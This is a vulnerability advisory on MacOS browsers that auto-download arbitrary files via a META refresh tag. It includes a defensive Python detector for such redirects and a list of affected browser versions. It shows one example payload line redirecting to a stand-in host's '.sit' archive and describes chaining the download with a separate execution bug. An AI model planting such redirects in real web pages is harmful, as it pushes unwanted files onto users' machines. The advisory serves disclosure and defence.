Title: Multiple Vendor MacOS Browser Arbitrary Program Download Vulnerability
Severity: MODERATE
Description:
Various browsers for MacOS and MacOS X in Classic Mode allow malicious web pages to automatically download arbitrary files to the vulnerable user's computer.
This can be accomplished through the use of a META refresh tag similar to the following:
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://foo.com/malicious.sit">
The ability to place arbitrary files in a known location such as the default download directory may aid in the exploitation of BID 3935, "Apple MacOS Internet Explorer File Execution Vulnerability".
Additionally, the automatic opening of compressed files may allow content to be placed in mounted disk images. When extracted, the malicious files will reside in a known location, allowing exploitation of BID 3935 without knowing the download directory of the vulnerable system.
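For defenders, the META refresh pattern described above can be detected in fetched or proxied HTML. The following Python sketch is an added example, not part of the original advisory: it parses META refresh tags and reports those whose target ends in an archive or disk-image extension. The extension list, the function and class names, and the example.test base URL are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit
import posixpath
import re

# Assumed watch list (not from the advisory): archive and disk-image types
# that a browser or helper application may unpack or mount after download.
RISKY_EXTENSIONS = {".sit", ".sea", ".hqx", ".bin", ".img", ".smi", ".dmg", ".zip"}

# CONTENT="<delay>;URL=<target>"; "URL=" is case-insensitive and optional.
REFRESH_RE = re.compile(r"^\s*(\d+(?:\.\d*)?)\s*[;,]\s*(?:url\s*=\s*)?(.+?)\s*$", re.I | re.S)

# Constructed sample page: two download redirects, one ordinary redirect,
# and one plain reload with no target.
SAMPLE_HTML = """<html><head>
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://foo.com/malicious.sit">
<meta http-equiv=Refresh content="0; url='/files/tool.dmg?id=7'">
<meta http-equiv="refresh" content="30;URL=news.html">
<meta http-equiv="refresh" content="600">
</head></html>"""


class RefreshFinder(HTMLParser):
    """Collects (delay, absolute_url) for every META refresh with a target."""

    def __init__(self, base_url):
        super().__init__(convert_charrefs=True)
        self.base_url = base_url
        self.refreshes = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # names arrive lowercased
        if tag != "meta" or a.get("http-equiv", "").strip().lower() != "refresh":
            return
        m = REFRESH_RE.match(a.get("content", ""))
        if m:  # a bare delay only reloads the current page
            target = m.group(2).strip("'\" ")
            self.refreshes.append((float(m.group(1)), urljoin(self.base_url, target)))


def find_download_refreshes(html, base_url):
    """Return refresh targets whose URL path ends in a watched extension."""
    finder = RefreshFinder(base_url)
    finder.feed(html)
    hits = []
    for delay, url in finder.refreshes:
        # Use only the path so query strings do not hide the extension.
        ext = posixpath.splitext(urlsplit(url).path)[1].lower()
        if ext in RISKY_EXTENSIONS:
            hits.append({"delay": delay, "url": url, "extension": ext})
    return hits
```

Matching on extension alone misses targets served through a server-side redirect or a Content-Disposition filename, so a proxy-level control should also inspect the response headers of the refresh target.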
Affected Products:
- Microsoft Internet Explorer Macintosh Edition 4.5.0
- Microsoft Internet Explorer Macintosh Edition 4.5.0MRJ 2.1.4
- Microsoft Internet Explorer Macintosh Edition 4.5.0MRJ 2.2
- Microsoft Internet Explorer Macintosh Edition 5.0.0
- Netscape Netscape 4.77.0 Mac
- Netscape Netscape 4.78.0 Mac
- Omni Group OmniWeb 4.0.6
- Omni Group OmniWeb 4.1.0beta11
- Opera Software Opera Web Browser 5.0.0 Mac
- iCab Company iCab Pre 2.7.0
- iCab Company iCab Pre 2.71.0